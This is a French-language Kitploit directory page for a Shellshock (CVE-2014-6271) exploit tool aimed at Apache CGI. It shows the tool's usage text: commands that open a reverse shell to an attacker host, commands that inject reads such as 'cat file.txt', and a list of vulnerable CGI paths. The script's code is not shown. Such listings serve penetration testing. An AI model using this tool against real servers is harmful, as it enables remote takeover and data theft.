Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Outil Apache Shellshock d'injection de commande à distance pour un reverse shell rapide et la navigation de fichiers | Kitploit
Outils/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[CVE-2014-6271] Outil Apache Shellshock d'injection de commande à distance pour un reverse shell rapide et la navigation de fichiers

Voir le dépôt
il y a 3 ansPas encore vérifié

[CVE-2014-6271] Shellshock-Remote-Command-Injection

[CVE-2014-6271] Outil Apache Shellshock Remote Command Injection pour un reverse shell rapide et la navigation dans les fichiers

root@kitploit:~
Shellshock Apache remote exploit

Usage:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variables:
    Victim:
        rhost => Victim IP
        rport => Victim PORT 
        
    Attacker (For reverse shell):
        lhost => Attacker IP
        lport => Attacker PORT for reverse shell 
    
    Echo:
        echo => Custom command to inject
        
        Examples:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Specific cgi vulnerable pages 
            Exploitable pages:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
        "files" => Read and browse through files (Requires: rhost, echo)    
        
    Created by Filip Studený
Télécharger l’outil